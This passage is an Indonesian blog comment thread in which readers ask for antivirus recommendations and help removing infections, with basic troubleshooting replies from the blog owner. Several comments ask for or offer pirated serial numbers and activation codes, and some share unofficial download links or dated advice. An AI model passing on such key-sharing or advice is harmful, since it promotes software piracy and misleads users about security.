    eitts yg penting di update trusss donkzz,,

  103. makasih banget tuk info2nya, web site ini bagus banget! thanks!

  104. komputerku anti virusnya nod32, kalo mau pake antivirus lagi, baiknya anti virus apa ya?
    trus, kalo mau ganti antivirus, cara ngilangin antivirus yang dah ada gmn? apa cukup dengan men-delet biasa?
    (aku gak begitu ngerti tentang pengkomputeran, bisanya cuma make komputer aja)
    thanks atas jawabannya …

  105. thx…numpang download……
    mas saya mwu tanya… diantara avira,avg 8.0,pc mav,NOD 32,avast..bagusan mana yaght yang bisa ngebersihin virus tapi ga ngerusak data….trus yang bisa ngebersihin virus mpe tuntas keakar-akarnya???

    thx sebelumnya….
    bales via e-mail saya : joey_suckruless@yahoo.co.id

    trimakasih banyak….

  106. Aku liat2 kok gak ada yg komen tentang Sysmantec Norton anti virus ya, kira2 gimana kinerjanya

  107. komputerku anti virusnya nod32, kalo mau pake antivirus lagi, baiknya anti virus apa ya?
    trus, kalo mau ganti antivirus, cara ngilangin antivirus yang dah ada gmn? apa cukup dengan men-delet biasa?
    (aku gak begitu ngerti tentang pengkomputeran, bisanya cuma make komputer aja)
    thanks atas jawabannya

  108. @DEWIDEWI
    Coba dengan avira 8.0 free edition. Untuk menghilangkannya jangan langsung di delete, tapi dengan fasilitas Uninstall yang disertakan dalam menunya (biasanya ada di Start Menu)..

    @Bang Yant
    Norton dan Symantec kebanyakan dipakai di coorporate atau perusahaan sepertinya.. dan keduanya tidak menyediakan versi gratis…

  109. Gw kut nimbrunk ach..,,,
    Antivirus terbaik ternyata memang AVIRA, terutama yang premium security suite.

    dah GW coBA…

    skarang kira2x dah ngedetek lebih dari 1520000 lebih virus n variannya.
    lebih mantap lagi klo digabung ma PCMAV…!!!

    uuggghh….
    mantep bnerrrr..!
    download ja!!!!!
    butuh lisensi ni yg premuim security suite v8
    https://license.avira.com/en/promotion-cj0ptfb6eh8cmw6a101r

  110. makasih atas infonya,,,,
    kebetulan kompi saya lagi bermasalah ma virus,…
    kayanya saya mau coba antivir dech, coz pk spyware malah jadi sering mati-mati gt…
    thanks yupz

  111. mau tanya nech?….
    antivirus yg gw pk itu antivirus 2009, tapi kompi gw malah jadi aneh gt,….
    malah suka mati tiba2 gt,…
    akhirnya gw beralih k anvira tapi antivirus 2009 spyware pas gw mau removed ga bs,… ada yg tau ga cra removednya?
    cz ga ada d control panel bgtu mau di delete dr program file ga bisa jg, thanks infonya teman,…

  112. Eh gw mo tanya antivirus ind yg bguss!!!!! pa ya slain PCMAV??????????

  113. @kei
    Jika seperti itu, coba di install ulang lagi antivirus 2009-nya kemudian baru di uninstall. Biasanya berhasil..

  114. aku bingung, cari antivirus buat komputer, yang baik itu yang gimana? trus apa ada download antivirus yang free… trims…

  115. Mao tanya neh buat teman2 sekalian..
    Komp saya mengalamin kejadian aneh,tiap 30menit pasti restard sendiri,jd tiap di scan memakan waktu lama psti gagal krn tiap 30 mnt psti restard sendiri tsb..

    apakah komp saya kena virus atau spyware ya??

    makasi atas infonya..

  116. Pingback: nuaink.co.cc » Blog Archive » Antivirus Terbaik Untuk Windows
  117. mas ebta, saya mau tanya. kenapa di komputer saya kok gak bisa munculin file2/folder2 yang hidden ya???
    saya sudah coba di menu control panel-folder option-show hdden file and folder kok tetep gak mau muncul folder/ file yang hdden?? apa ada virusnya?? saya mau penjelasannya, maklum saya baru belajar utak-atik komputer.
    email saya ya mas. bangkit_prismadani@yahoo.com
    skalian add FS saya bangkit_prismadani@yahoo.co.id

    makasih banyak

  118. @ahmad
    Artikel diatas bisa dijadikan referensi memilih antivirus yang bagus…

    @Aphing
    Jika pasti 30 menit, kemungkinan ada program/virus yang menyebabkan hal itu, coba dicek aplikasi atau proses yang berjalan dengan windows

    @Dwiko
    Sudah saya lihat.. 😉

    @bangkit
    Coba dihilangkan juga tanda cek (centang) di menu bawahnya “Hide protected operating system files (recommended)” kemudian klik OK atau Apply. Setelah ditutup, dicek lagi beberapa saat kemudian, jika ternyata kembali ada tanda cek-nya berarti kemungkinan terkena virus.

  119. baru-baru ini saya terkena virus MAXTROX
    tampilan dasktop berubah
    tampilan pada C/Windows Berubah
    Scen virus engak bisa

    Gimana ya…?
    anti virus untuk VIRUS MAXTROX yang baik itu apa?

  120. Kenyataanya semua AntiVirus memiliki karakteristik yang sama, jika ditemukan virus baru maka mereka akan meneliti, mengembangkan, dan kemudian meluncurkan update untuk virus signatures yang terbaru dan wajib download bagi para konsumen. Namun toh virus sudah terlanjur masuk ke komputer 😀 dan kalaupun ada AntiVirus yang paling hebat adalah, kalau mampu membersihkan dan mengembalikan file yang sudah terinfeksi kembali ke semula.

    Jadi solusi terbaik adalah menjaga komputer agar terhindar dari virus, layaknya kata “lebih baik mencegah daripada mengobati”, caranya? untuk cara menghindari terinfeksi virus bisa banyak di temukan dengan pencarian melalui search engine(Google.com) :D, dan menurut analisa saya pribadi, kebanyakan virus menulari komputer melalui:

    1. Website (yg mengandung: spam,phising,pop-up,porn)
    2. Autoplay (pada: USB-Disk/Flash-Disk/apalah namanya :D, dan media lain saat di tancapkan lewat USB-Port)
    3. Program yang tidak dikenal (crack,keygen, dan semacamnya)
    4. file2 yang perlu berhati-hati dalam meng-eksekusi (.exe .bat .com .vbs .reg .msi dan file eksekusi lainnya)

    namun tidak kesemuanya itu benar, tergantung pada system dan environment(ruang lingkup) masing masing pemilik komputer, misalnya: terhubung internet 24-jam, tidak terhubung internet, atau bahkan komputer yang hanya memiliki floppy-disk 😀

    salam,
    Rud

  121. buat alphing,…
    saya jg pernah mengalami hal tsb, layaknya sich wkt itu kena spyware
    ujung-ujungnya istall ulang aja coba,…

  122. mas, tolong dunks!!! Kompie nya aku kena virus
    sering restart walaupun baru dihidupin, truz kalo nginstal
    program apapun ketika lagi jalan suka restart.
    tolong y mas…

  123. USB disk security membantu saya melindungi komputer dari virus. Gunanya untuk menonaktifkan autorun (autorun.inf) yang ada di sebuah flashdisk yang suspect kena virus. File autorun.inf pada flashdisk ada karena ada virus (yang menggunakannya untuk mengkopi ke komp kita). Cari lwt google ada atau alamat ini:
    http://rapidshare.com/files/104203290/USB_Disk_Security.rar

  124. mas ebta klmp sy kena virus
    Autorun.inf:inf.Suspect
    ccc.exe: Trojan.Agent-26905
    ckc.exe: Trojan Agent-26905
    document and settinguserlocal settingtemporary internet Filescomtent.IE5G3YG7VSChah(1) exe: Trojan.Agent-26905
    RECYCLERS-1-5-21-1482476501-1644491937-682003330-1013ise32.exe: Trojan.Agent-37883 FOUND
    C:WINDOWSsystem32drivelam3.exe: Trojan.Flooder.1 FOUND
    C:WINDOWSsystem32drivelam4.exe: Virtool.Hiddenrun.G FOUND
    C:WINDOWSsystem32drivelmz.exe: Trojan.IRC-Script-66 FOUND
    C:WINDOWSsystem32drivelmz1.bmp: Trojan.IRC-Script-42 FOUND
    C:WINDOWSsystem32drivelmz3.bmp: Trojan.IRC-Script-61 FOUND
    pakai clam win, tp tetap aja ada terus bgmn cara menghilangkan? trimks…

  125. Terima kasih pak, untuk ulasan antivirusnya, sangat berguna sekali…
    Kayaknya Antivir menarik juga yah, mau coba ahhh…
    Hehehehe (Mo cerita)… jujur aja, komputer saya belakangan ini gak pernah ngadat gara2 virus (Kecuali waktu pertama kali punya komputer)coz saya selalu berusaha mencegah masuknya virus daripada menyembuhkan virus, saya pake Avast Home Edition, nih antivirus termasuk anti virus yang bawel (Tapi ogut suka!). Setiap kali ada flash disk yang mau nongkrong ke konputer, bisa bapak bayangkan apa yang saya lakukan (Pokoknya paranoid gituh…), saya scan pake Ansav dahulu atau PCMAV, terus saya scan juga pake Avast-nya, gak itu juga aja, saya scan juga pake A-squared free edition (Bagus nih!)takut spyware ada yang nyangkut, pokoknya superpreventif! Buat firewall, Comodo bagus banget (Menurut saya). Alhamdulillah, komputer gak pernah rewel. Pokoknya, mencegah lebih baik daripada mengobati, betul kan pak Ebta?

  126. @bakok
    Jika seperti itu coba hardisk discan di komputer lain, atau menggunakan antivirus atau rescue CD melalui Bootable CD (ada beberapa artikel tentang Bootable CD ini di ebsoft)

    @titik
    Sudah dicoba dengan antivirus lain, saya dulu juga pernah mencoba menggunakan ClamWin, tetapi kurang puas dengan hasilnya..

    @Aditya
    Iya betul, mencegah jauh lebih baik dan lebih mudah daripada mengobati.. jika menggunakan AV, intinya harus senantiasa update selain faktor pengguna juga berpengaruh..

  127. halo guys
    thanks for information
    bisa tanya gak, kompi temenkku kena virus….
    namanya tidak tau
    yang penting duplikasi “readme.eml”
    bisa jelasin gak and antivirus apa yang suitable?
    bales di email saja ya
    ivanegold@yahoo.com

  128. kallo menurut kamianti virus yang terbaik serta tidak rumit itu hanya McAfee… sangat puas dech dan g menyesal bilamenggunakan McAfee..
    tapi sangat jarang warnet yang memakai anti virus McAfee untuk keamanan internetnya
    bagi yang memiliki usaha warnet… bok dicoba kali2 menggunakan anti virus McAfee… hehehhe…”Promosi”…
    matursuwun…

  129. Assalamu’alaikum Warahmatullah Wabarokatuh

    Semua Virus bisa dihilangkan kalo cocok….
    tapi kalo file berupa *.EXE lebih baik ansav, tapi ansav juga berbahaya sebab apabila ada applikasi yang menurut kita penting ansav tidak pandang bulu, terjangkit langsung hapus, avira lebih baik data sebelum masuk harddisk computer sudah mendeteksi apabila memang terjangkit…..,AVG hampir sama dengan ansav bedanya AVG mengenali virus melalui imaage….,cntoh game biasanya yang biasanya kena tiba2 error itulah file terdeteksi virus oleh AVG…..,itu pengalaman saya…..,saya cari antivir yang tidak manghapus tapi membenahi….^:)^

  130. Untuk melihat dan mengembalikan Folder dan File yg di “Hidden” oleh virus, bisa menggunakan Total Commander. Download trialnya di http://www.ghisler.com kemudian lisence keynya bisa minta ke saya di majapahitku@gmail.com

    Saya pake BitDefender 2008 dan Kaspersky v.8.0.45 dan sdah dapet lisence key-nya (di dua komputer secara terpisah) dan sejauh ini baik2 saja padahal saya sering mengunjungi websyte2 utk download program (yg banyak virusnya).

  131. Assalamualaikum….

    Tadi saya ada baca tentang pengabungan 2 antivirus yaitu Antivir dgn AVG…tolng minta penjelasaan ya lebih rinci…saya tidak begitu paham neh….

  132. @ardi wardana
    wa’alaikumsalaam.. maksudnya menginstall 2 antivirus, jadi masing-masing tetap kerja sendiri-sendiri, tetapi satu komputer ada 2 antivirus

  133. Assalamualaikum……
    Sebelumnya terima kasih atas responnya dari pertanyaan saya…
    Iya Pa…saya itu ada baca klo AVG itu bisa di gabung sama Antivir..
    atau menurut bapak apa memang bisa 2 antivirus atau mungkin lebih dari dua itu digabung bersamaan dalam 1 cmputer…klo memang bisa antivirus apa dengan apa yg bagus untuk di padukan….
    Mohon penjelasaannya…

    Terima kasih sebelumnya…

    Wassalamualikum….

  134. @angga
    yang dimaksud download antivirus yang mana ? artikel diatas ada lebih dari 20 antivirus..

    @Ardhy Wardhana
    Wa’alaikumsalaam… Bisa saja, saya pernah mencoba 3 antivirus bersamaan (untuk ujicoba saja) dan bisa, hanya saja memang cukup berat.. Avira bisa digabung dengan antivirus lain seperti AVG, Avast, Bitdefender, Rising. Hanya saja jika satu saja cukup, lebih baik tidak usah menggunakan 2 antivirus atau lebih..

  135. Assalamu’alaikum Warahmatullah Wabarokatuh,
    mo nanya neh 🙂
    lebih bagus mana antivirusnorton, avira ato kapersky 08?
    atau tergantung dari virusnya?
    di kantor saya jaringan nya kena virus, jadi satu komputer sembuh, tp yg laen blm bisa bkn yg sembuh kena lg,
    gmn cara efektifnya? thx

  136. @mona
    wa’alaikumsalaam warahmatullah wabarokatuh
    Seperti disebutkan diatas, sebenarnya asal senantiasa update, hampir antivirus-antivirus tersebut bagus. Memang kadang virus satu tidak terdeteksi antivirus lainnya, kadang sebaliknya..
    Jadi Test diatas mungkin bisa sedikit membimbing/membantu kita dalam memilih antivirus..
    Kalau diminta memilih, Pilih Avira atau Kaspersky saja

  137. Memang buanyak antivitus yang ditawarkan berbagai perusahaan, tangguh, bandal dsb. tetapi nyatanya tidak. Sebaiknya perusahaan antivirus harus memproduksi cukup memuaskan konsumen hal seperti ini juga akan ada kepercayaan konsumen

  138. Assalamualailkum….

    Terima kasih bnyak atas saran nya……….

    Sebelumnya saya sdh coba download Antivir,,,setelah selasai trus setup nya saya instal tapi sudah lebih dari 2X download selalu waktu d instal saya selalu mendapat koment klo di suruh download ulang (ada yg kurang…..kira2nya begitu dah…..)..
    Apa cara saya mendownload yg salah……..
    Klo gt kira2 langkah2 mendownload antivir yg bener bagaimana ya…………..

    Trus sekarg sudah 2 hari ini saya menggunakan AVG 08…namun setiap saya menyalakan Notebook selalu saja minta d Update…kan ribet…(untung saya menggunakan Modem yg kemn pun pergi saya selalu saya bawa)…
    Maaf…..kira2 apa menang seperti itu porses update AVG…n berlangsung berapa lama tuh hal seperti yg saya alami ….

    Mohon penjelasannya kembali….

    Maaf saya kurang begitu paham…..terima kasih……

    Wassalamualaikum…..

  139. @??.. (#73)
    wa’alaikumsalaam..
    Coba download yang versi zip, kemudian di extract dan diinstall. Jika ketika di install muncul informasi yang sama, coba di scan komputernya. Kemungikan ada virus yang otomatis menghapus file instalasi avira, ketika akan di install. seperti ini bisa saja terjadi..

  140. kalo dibilang virus itu tergantung dari OS maupun aplikasi yang dibawa dalam OS tsbt. tuk bisa ngejalanin PCMAV, salah satu yg wajib diketahui adlh, jgn pernah scan virus pake Flashdisk, scan pake cd/di burn ke CD dulu baru discan, tapi sebelumnya instal avast program maupun update terakhir juga menggunakan CD, agar saat scan PCMAV gak di lock ma itu virus, gak ada yg sebaik anti vir lokal deh, membersihkan tanpa merusak file PCMAV , thanxs for all

  141. aku pake rising av….
    tapi pengalaman memang avira yang paling banyak ndetect, kusarankan pake ansav.
    ok
    ok
    ok

  142. kuno pake antivirus! pakailah behaviour blocker, ato gak usah kasi antivirus dan siapkan cd xp boootable 1buat instal ulang

  143. mas ebta q install avira di komputer q kok g bsa y. ada pesan yang kalau diartikan ke indonesia harus membuat koneksi internet pada hal q gak nyambung internet alias offline, gimana donk mas ebta please bantu aq ya 🙂

  144. Mas tolongi kita2 dong.komputer kita terkena serangan virus Harry.kita udah coba beberapa anti virus tapi tidak terdeteksi sama anti virusnya.jadi solusinya gimana.bantuin kita dong bagi teman yang tahu cara mengatas serangan virus harry ini.tolooooooooooooooonnnnnnnnnnnng……

  145. @SIHOOO
    Itu avira Free Edition atau Premium Edition, kalau yang free harusnya tanpa online bisa. Kalau yang Premium sepertinya memang harus validasi via internet..

    @rian
    Jika sumber virusnya sudah diketahui, coba cari lainnya dan hapus manual dengan bootable CD atau lewat komputer lain (hardisk dilepas)

    @.. All
    Terimakasih atas atensinya.. (tidak bisa menanggapi satu-satu)

  146. @Taktiku
    Ada link di bagian kanan blog ini (sidebar), untuk update kaspersky harus disesuaikan dengan versi yang digunakan, karena ada beberapa versi dan masing-masing berbeda.

  147. Assalamu’alaikum Warahmatullah Wabarakatuh…
    Sekedar info buat yang lain, selama ini saya cuman pake anti virus mcAfee8 yg Alhamdulillah ampuh mengatasi virus-virus dari HP, kebetulan profesi saya adalah teknisi HP. Tapi saya blm tau anti virus apa yg ampuh buat internetan. Mohon saran dari bang Ebta…

  148. Norman bagus banget kalo sering di update
    TAPI LINUX LEBIH BAGUS KARENA GA AD VIRUSNYA
    HALAL LAGI
    BERKAH DATANG DALAM KERIDHOAN-NYA(pencipta OS)

  149. @Ekal
    Wa’alaikumsalam warahmatullah wabarokatuh
    Pakai yang free saja, misal Avira, Avast, AVG, Bit Defender, Rising atau yang lainnya..

  150. memang anvast sangat baik, tapi kadang didetec kembali setelah di scan dan direstart masih nampak ada, bagaimana agar sebaiknya tetap exis dan betul2 hilang dan data terlindungi, mungkin saya yg kurang bisa memakaimya

  151. makasih atas saran saran nya ya klo bisa kirimin antivirus nya dong makasih ya w tunggu besok lo makasih ya

  152. Mas Ebta yang baik,
    Setelah saya baca artikel ini, saya coba install Avira, tp qo updatenya lama bgt ya.. ?
    Apakah IVDF (Unicode) bisa membantu supaya upadate lbh lancar?
    Saya coba scan komputer pake avira, ternyata dari hasil scan muncul warning 5 yang lain 0, artinya apa ya? trus apa tindakan selanjutnya
    Antivirus apa yg free tp yang updatenya gampang n ga lama?

    Maaf agak banyak pertanyaannya, mohon dijawab.

    Terima kasih.

  153. @candra
    Saya sudah agak lama tidak menggunakan avast, jadi tidak familiar dengan menu-menu pengaturannya..

    @andy
    Sebagian besar antivirus sulit dikirim via email, terutama karena ukuran yang besar. jadi solusinya memang download langsung..

    @April
    Memang avira updatenya kadang cukup lama. Jika ada koneksi yang cepat, download manual saja updatenya (IVDF)..
    Untuk warning perlu diperjelas, file apa saja..
    Sebenarnya jika koneksi internet cukup dan stabil, rata-rata antivirus free updatenya mudah..

  154. kwok kwok kowk kwok addddduhhhhh komp gue byk virusnya neh….mau install anti virus malah ngeblank >.<

    ada yg tw g cranya gmna selain diformat ????

  155. assalamua’alaykum warohmatullohi wabarokatuh

    syukron atas infonya.
    sitenya sangat menarik.
    bangga memiliki kawan seagama seperti anda.
    terus berkarya…

  156. saya pnh terkena virus yg nyerang file.doc saya..
    dulu saya pake avg,, tp gak kedeteck..
    akhirnya saia pake nod32..
    alhasil virus kedeteck n die..
    tp file saia ilang..
    ada yah antivir yg ngedeck tanpa harus mendelete file?

  157. ada ngak sih antivirus yang bisa terditek dan menghapus langsung? kalau ada tolong dong kasih tahu antivirusnya apa?

  158. bagaimana cara menghilangkan antivirus “tambalban” dan virus “BatamHacker” dan antivirus apa yang terbaik untuk membereskan itu semua… trimakasih sebelumnya. aku info secepatnya.

  159. Please help me….?. Saya bingung virus apa yang masuk ke komputer saya. Karena mulai dari perintah task manager, regedit, msconfig semua ada peringatan bahwa saya tidak bisa mengaksesnya karena dinon aktifkan oleh administrator. sedangkan kalo aku format ulang sistemnya (uda macem2 cd windows). pas install antivirus (semua rata2 uda aku coba) awalnya hang, kemudian restart nah mulailah masalah ini. aku mau format drive D nya tapi datanya terlalu banyak 200 GB(File Master Install, lagu2, dan dokumen pekerjaan proyek dan gambar aku). dan kelihatannya virusnya masuk ke file exe master instalan. sekarang aku pakai aja sementara walau lambat dan sering hang pas masuk ke command yang ada kata2 “send to”. kasversky yang aku pakai juga uda mo habis masa aktifnya tinggal 5 hari. please help me ….

  160. @Anonymous @khoirul
    Coba baca artikel terbaru ebsoft (tanggal saat ini), jika ada yang perlu ditanyakan lagi, silahkan di tulis di artikel tersebut

    @agsan
    Saat ini sudah menggunakan antivirus apa?

    @Putra Angkasa
    Jika sudah sampai seperti itu, coba gunakan liveCD/bootable CD UBCD4Win, ada artikel tentang hal ini di ebsoft..

  161. Pingback: Antivirus Terbaik Versi Av-Comparatives « Muslim’s Weblog
  162. Tolong pencerahannya dong……………
    Aku coba instal Ansavbeta d compiku,beberapa kali ku coba tetap saj ga’mau terinstal,……. (dalam setengah jalan selalu terhenti dan tertulis “can not register servis” dan akhirnya instal error).
    Ada apa dengan registriku? ada cara ga’ buat benerin registri yang error?…….
    Makasih sebelumnya ya……..

  163. @butoijo
    mungkin lebih tepat jika ditanyakan ke forum pengembang ansav, atau email langsung ke pembuatnya.. saya belum pernah mencoba ansav. Mungkin itu ada konflik dengan aplikasi lain atau masalah kompatibilitas

  164. Ansav beta gini mas mending jangan diinstal.buat portebel aja sebab ansav bisa buat crash sistem kl kompi mas sudah ada antivirusnya oke..
    _untuk mas putra coba pakai kaspersky yang free trial lalu diupdate yah
    semoga dapat membantu

  165. Heeeeelllllllllpppppp duonk…….Virus Boot.exe susaaaaaaahhhhhhhh…….Banget buat diapusssss……Ppppuuuuuccccciiiinggggg deecchh….Malah bikin error komp lg……

  166. Pingback: Rendra’s Blog » Blog Archive » Cara Meng-update Antivirus Antivir
  167. komputer saya data”nya hilank,semenjak saya meremove program avg 8.
    n anehnya gc bisa di tambah dgn aplikasi laen,memorinya kna…
    smua data kaya d hide…
    cara memulihkannya gmn yh??
    mohon penjelasannya!!

    trims’s

  168. @Nina
    Sebaiknya di scan dari komputer yang bebad dari virus, atau gunakan scan dari live CD

    @tofan
    COba di cek file-file yang di hidden, mungkin hanya di sembunyikan saja..
    Sepertinya memeng cukup parah, alternatifnya mungkin seperti jawaban saya sebelumnya ke @Nina

  169. Sobatku , komptr ku dulu kena virus ampe file nya hilang ( hiddden } dibawa ke servis biayanya Rp. 150.000,- akhirnya aku coba pake Avira dan ANSAV , hasilnya cukup memuaskan dan kini aku nggak perlu lagi bolak balik ke tempat servis…..

  170. Hai, bagi pengalaman saja.
    Dulu kalau pakai kompi dan kena virus dll maka cara paling ampuh ya re-install windows lagi hehe cuapek deh.
    Sekarang pakai program pembeku sistem seperti DeepFreeze, sehingga setiap restart selalu kembali ke sistem sebelumnya. Dengan demikian antivirus tidak perlu aktif (karena banyak memakai memori), dan hanya digunakan kadang2, seperti kalau mau scan flashdisk/update antivirus definition.

  171. tidak ada gunanya menginstal antivirus. semuanya perusak dan bikin cape’ (scan, update, fals alarm dll)

    aku sudah buat tutorial tentang menghadapi virus tanpa antivirus. selengkapnya di http://bukuhitam.co.cc

  172. @ipoy
    Gunakan antivirus avira yang ada di liveCD UBCD4Win, jangan lupa download update-nya, proses update bisa dilakukan dari flashdisk. Biasanya master-master program di drive lainnya juga terkena virus ini.. Kemarin sempat scan dan versi virut sudah sampai Virut.AG kalau tidak salah..

  173. banyak antivirus dunia yang mendeteksi virus virus berbahaya. tapi apakah antivirus tersebut dapat mendeteksi virus virus buatan orang indonesia yang mungkin hanya menyebar di indonesia. mohon bantuan antivirus apa yang dapat mengenali virus virus lokal / virus indonesia.

  174. Begh paragh mosok avast!nya paragh udagh gw kasi license code ekh kok malah 3 bulan kemudian mau expired.
    gw coba masukin licensenya lg gak iso.
    Vegh parah

    Mohon Bantuannya!!!!!!
    kirim ke (andika_h2o10@yahoo.com)

  175. semua pada mengandalkan antivirus padahal yang paling bisa menghilangkan virus adalah “ALLAH” SWT

  176. and buat yang bener bener ga isa apa2x udah pasrah ajah.
    And jangan lupa berdoa

  177. @irfan (219)
    Biasanya antivirus luar juga bisa, hanya sering updatenya agak lama untuk bisa mengenali virus lokal..

    @NoBody
    Ya benar, tetapi kita juga harus berusaha, tidak hanya berdoa saja..

  178. Pingback: Antivirus Terbaik Tahun 2008 « Johanpratama’s Weblog
  179. web yg sangat bermanfaat bagi saya yang awan sekali tentang dunia per-virusan komputer….terima kasih buat semuanya

  180. maaf apa ada yang punya SN norton antivirus 2009. klo ada saya minta

  181. KLO BOLEH SAYA MINTA SERIAL NUMBERNYA AVG 8.0 YANG INTERNET SECURITY

  182. Assalamualaikum… Mhon bantuan. Anti virus apa yg pling ampuh membantai trojan horses??? Notebook sya lg aneh. Tiap masukin flask disk yg gag b’rvirus (udh clean) trz sya scan pke pcmav yg ada d notebook sya slalu ngedetect autorun.Inf. Dan folder recycl

  183. @Nenk_meena
    Wa’alaikumsalaam, coba gunakan avira dengan update terakhir..
    atau jika PCMAV bisa mendeteksi, coba scan dengan PCMAP-CLN

  184. Kepada semua prend-prend,Saya minta informasi tantang antivirus yang bisa mengalahkan virus “HOKAGE” duonk. Kalau ada yang tahu tlng krim email ke lelenk_Antikbgt@yahoo.co.id

    Thank’s bgt buat prend-prend smua.

  185. Untuk mas adon…
    coba pilih salah satu file yg terinfeksi virus HOKAGE, lalu kirim ke virustotal.com. ada 36 AV yg akan mendeteksi, lalu pilih aja AV yg mana yg bs mendeteksi…. Dan coba Avira? PCMAV? AVG?

  186. Pingback: » Anti Virus Yang Paling Baik My Blog
  187. Mas ebta, komp saya kena virus plolonk.
    bisa info solusi menghilangkan virus tsb.
    trus paling banyak komp bisa di install brp antivirus ya?
    thx

  188. @Adon
    Iya, benar saran mas Abu Izza..

    @riez
    sebelumnya, antivirus yang mendeteksi virus tersebut apa? virus lokal atau bukan?
    Sebenarnya tidak ada ukuran berapa banyak komputer bisa di install antivirus. Idealnya hanya 1, meski 2 atau 3 masih bisa, tetapi perlu dilihat efek sampingnya nanti..

  189. oke, thanks bgt bat mas abu izza n mas ebta. Virus yang menjangkiti Cmputer saya virus lokal, tapi udah saya bersihkan dengan AVG. tapi file n systemny yang dijangkiti ikut ke heal jg. jdinya tak instal ulang deh…..!!! tapi sekarang saya pake Avira mas!!!

    skali lagi makasih bgt atas sarannya..!!!sampai jumpa lagi.

  190. Assalamualaikum. Mas mhon bantuan carikan info AV lokal yg bsa ngedelet virus CEGAHPLUTO.EXE udh d scan pake pcmav 1.7 juga gag trdetect. Trus sya scan juga pke mc avee 8.0 bsa terdetect tp gag mau d delete atau d m0ve quarantine. Trimakasih.

  191. Pingback: My Blog » Blog Archive » Beberapa Tips Update Avira Antivir
  192. @adon
    Sama-sama mas, semoga nantinya tidak terulang lagi

    @Nenk_maena
    wa’alaikumsalaam, sepertinya PCMAV saat ini sudah versi 1.8, mungkin sudah bisa mendeteksi..
    Jika sudah terkena alternatifnya menggunakan liveCD atau di scan di komputer lain

  193. assalamu’alaykum,afwn asal msk..
    akh,software antum kpn dijdkan compatible dgn hp..spt kamus,shollu dll…?

  194. tambahan ne, antivirus Antivir bisa gak di update gak pake sambungan internet, kayak Mc afee kan tinggal cari di google superDAT nya(updater) & tgl download aje, klw Antivir ada gak mas? kasi tw caranya ya!!!!!

  195. @saiyant
    wa’alaikumsalaam..
    kalau software shollu, sudah ada yang serupa untuk HP, fiturnya juga mirip.. coba saja azan times..
    Kalau kamus belum tahu, saya masih awam dengan programming untuk HP

    @dedek
    sality akan menginfeksi file-file executable, tetapi sepertinya ada tools untuk memperbaikinnya di situs AVG

    @Anonymous (42)
    Bisa, coba baca artikel berikut :
    http://ebsoft.web.id/2008/06/28/tips-update-antivirus-avira-antivir/

  196. antivirus apa yang cocok untuk menghapus virus yang berbentuk file gambar formatnya jpg

  197. @elviana
    mungkin itu bukan file gambar, tetapi ekstensi sebenarnya di hidden, misalnya gambar.jpg.exe
    kalau antivirus, coba saja Avira free edition

  198. mas ak mw nnya bleh gk si di komp msg 3 antivrus..
    ak skrg mke avira sma pc media..
    ak mw nmbh lgy pke ansav..gmn nnt bsa ngrusak sstm krja gk??
    trs itu bkl bhaya gk??
    mksh..bls ya.

  199. assalamualaikum wr.wb

    saya mw mnta tlg activation code bwt kapersky brp y??
    tlg krmn ke email saya y,..

  200. @revhanz
    wa’alaikumsalaam warahmatullah wabaroaktuh
    Kalau merusak sepertinya tidak, paling hanya akan menambah berat kerja komputer saja, dan agak ribet jika semuanya saling mendeteksi virus yang sama.

  201. asalammualaikum wr.wb……..
    mas ebta, antivir apa yang bagus n’ bisa dipke khusus ma windows vista. trus bisa ga minta kode activationx antivir kaspersky…….
    thanks ya…………

  202. Pingback: Performa Antivirus Terbaik versi PassMark « Radi Permana
  203. oh gtu brti itu gk ngrusak sstm kerja.. mksh ats pmbrthuanya..
    skrg ak gunain antivirus avira sma pc media 1.8..
    trs brti ms.confignya ktnya hrs di turn off,itu bnr gk??itu spaya knp ya??
    oy ak mnta tlg bwt kode activation kapersky 7.0 y?mksh.

  204. @dyvriel
    wa’alaikumsalaam warahamtullah wabarokatuh, free antivirus seperti avira cukup bagus..
    Saya tidak punya kode aktivasi kaspersky..

    @revhanz
    bukan ms config setahu saya, tetapi sistem restore..

  205. oh mksdunya sistem restore yg ad di propertis my computer ya??
    oy mas ebta sya msh krg ngerti sma kgunaan n fungsi turn off dan turn on pda sistem restore..bsa dijelasin sdkt gk mas??
    oy itu aj mas prtayaan saya,mksh y ats jwbn yg sblumnya..

  206. @sandi
    Scan dengan antivirus, baik langsung, lewat BootableCD atau melalui komputer lain…
    Ada berbagai artikel di ebsoft tentang hal ini.. coba dijelajahi..

    @revhanz
    Jika sistem restore on, kita bisa menyimpan kondisi windows saat itu dan ketika terjadi suatu masalah dengan windows, kondisinya bisa kita kembalikan ke keadaan saat kita menyimpan tersebut..
    Jika dimatikan maka tidak bisa menyimpan kondisi windows saat itu.. Biasanya yang disimpan termasuk file-file sistem windows ( exe, dll dan lainnya )..

  207. mas ebta bda antispyware sama firewall ap si??
    skrag ak mke comodo firewall pro..
    tp ak jg mke antispyware..itu gmna mnrut mas ebta??
    mnta pnjelasnnya dnk mas..
    klo firewall sma antispyware yg bgs tuuh ap ya??

  208. mas saya baru aja download avira premium security suite tapi setelah dinstal kok harus bayar? katanya gratissssssssss..? trims infonya

  209. komputer saya kan online internet mas bagusnya pake avira free edition atau avira premium security suite mas? diharapkan sekali mas jawabannya trimssss…

  210. Assalamu’alaikum Warahmatullah Wabarokatuh.
    Saya mau tanya ada gak aplikasi buat ngehack purchase antivirus?Soalnya saya “BT” bangets setiap saya mau download antivirus yang bagus pasti harus bayar(purchase)gimana cara ngatasinya yach?Tolong klo ada yang tahu email saya yach ke : gunawandirgantoro@yahoo.co.id!Trima kasih atas infonya!

  211. @revhanz
    Kalau spyware itu seperti program atau kode-kode yang secara sembunyi di pasang di komputer kita dengan tujuan seperti membuka web tertentu, manampilkan iklan-iklan dsb..
    Kalau firewall untuk melindungi komputer dari akses segala macam aplikasi dari luar dan dalam yg tidak diketahui

    @dewa
    Wah itu salah download, kalau yang premium memang tidk gratis. Coba downloadnya dari situs http://www.free-av.com atau dari download.com, avira free edition

    @Dirgantoro Gunawan
    Wa’alaikumsalaam warahmatullah wabarokatuh
    sebaiknya menggunakan yang free saja, banyak pilihan kok, dan rata-rata cukup bagus

